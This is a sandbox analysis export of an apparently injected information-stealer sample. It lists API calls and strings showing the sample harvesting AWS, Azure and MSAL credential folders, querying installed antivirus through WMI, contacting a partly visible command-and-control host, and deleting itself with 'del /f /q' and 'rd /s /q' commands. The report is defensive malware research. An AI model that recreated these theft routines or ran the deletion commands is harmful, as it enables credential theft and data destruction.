Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
String ID: %s%s$delays.tmp
API String ID: 1620473967-1413376734
Opcode ID: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction ID: 11c0bd3ed3d7e6805384e8c578cb98533790a078e52b8311c5bcc7c05517a4c3
Opcode Fuzzy Hash: 5943a0df419b2f97d08efb2acebaf1400ff012adf14d9747056922950aa0c363
Instruction Fuzzy Hash: 2B41C8B1900218ABD7205F61AC4CF9F7B7DEB89715F1006BAF109E10A1DA354E54CF28

Function 004164BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004164E2

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416501
lstrcatA.KERNEL32(?,\.azure\), ref: 0041651E

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

_memset.LIBCMT ref: 00416556
lstrcatA.KERNEL32(?,00000000), ref: 00416578
lstrcatA.KERNEL32(?,\.aws\), ref: 00416595

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

_memset.LIBCMT ref: 004165CA
lstrcatA.KERNEL32(?,00000000), ref: 004165EC
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00416609
_memset.LIBCMT ref: 0041663E

Strings

Azure\.aws, xrefs: 004165A5
msal.cache, xrefs: 0041661E
\.azure\, xrefs: 00416512
*.*, xrefs: 004165AA
\.IdentityService\, xrefs: 004165FD
\.aws\, xrefs: 00416589
*.*, xrefs: 00416536
Azure\.azure, xrefs: 00416531
Azure\.IdentityService, xrefs: 00416619

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$_memsetwsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4216275855-974132213
Opcode ID: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction ID: c1663bc4ae337e97e36098b0a6fa5269247debf2670cee4f463a309fb8bc2b96
Opcode Fuzzy Hash: 76b6cfcc2cbbf7bce573afa5f5241ca90d425f37a5191db5c0e06d16ae103776
Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59

Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,004373D0,00436812,?,?,?), ref: 0040AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
lstrlenA.KERNEL32(00000000), ref: 0040AF7A
lstrlenA.KERNEL32(?), ref: 0040AF95
DeleteFileA.KERNEL32(?), ref: 0040AFD8

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95

Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4

Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB

Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2

Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6

Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A

Sleep.KERNEL32(000003E8), ref: 00417A9A

Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200

CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100

Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0

CloseHandle.KERNEL32(?), ref: 00418000

Strings

cowod., xrefs: 00417E7B
4b74261d834413e886f920a1e9dc5b33, xrefs: 0041770C
.exe, xrefs: 00417549
hopto, xrefs: 00417E9F
.exe, xrefs: 00417E04
org, xrefs: 00417EE7
_DEBUG.zip, xrefs: 00417F35
http://, xrefs: 00417E57

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
String ID: .exe$.exe$4b74261d834413e886f920a1e9dc5b33$_DEBUG.zip$cowod.$hopto$http://$org
API String ID: 305159127-1107223390
Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B

Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
StrCmpCA.SHLWAPI(?,true), ref: 004136AC

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

lstrcpyA.KERNEL32(?,?), ref: 0041376E
lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
lstrcpyA.KERNEL32(?,00000000), ref: 00413817
lstrcpyA.KERNEL32(?,00000000), ref: 00413853
lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
strtok_s.MSVCRT ref: 0041398F

Strings

false, xrefs: 004136C5
true, xrefs: 004136A6

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
RtlAllocateHeap.NTDLL(00000000), ref: 00405285
InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
StrCmpCA.SHLWAPI(?), ref: 004052C1
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
InternetCloseHandle.WININET(?), ref: 00405439
InternetCloseHandle.WININET(?), ref: 00405445
InternetCloseHandle.WININET(?), ref: 00405451

Strings

\xA, xrefs: 00405250, 00405457, 0040539E
GET, xrefs: 00405325

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET$\xA
API String ID: 442264750-571280152
Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

Unknown, xrefs: 00411AB4
Unknown, xrefs: 00411A99
Select * From AntiVirusProduct, xrefs: 00411A23
root\SecurityCenter2, xrefs: 004119F0
Unknown, xrefs: 00411AA0
displayName, xrefs: 00411A6F
WQL, xrefs: 00411A28

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
String ID:
API String ID: 2891980384-0
Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98

Function 00418271 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 120COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00418296
_memset.LIBCMT ref: 004182A5
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 004182BA

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

ShellExecuteEx.SHELL32(?), ref: 00418456
_memset.LIBCMT ref: 00418465
_memset.LIBCMT ref: 00418477
ExitProcess.KERNEL32 ref: 00418487

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

/c timeout /t 10 & del /f /q ", xrefs: 004182E5
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390
" & exit, xrefs: 004183DA
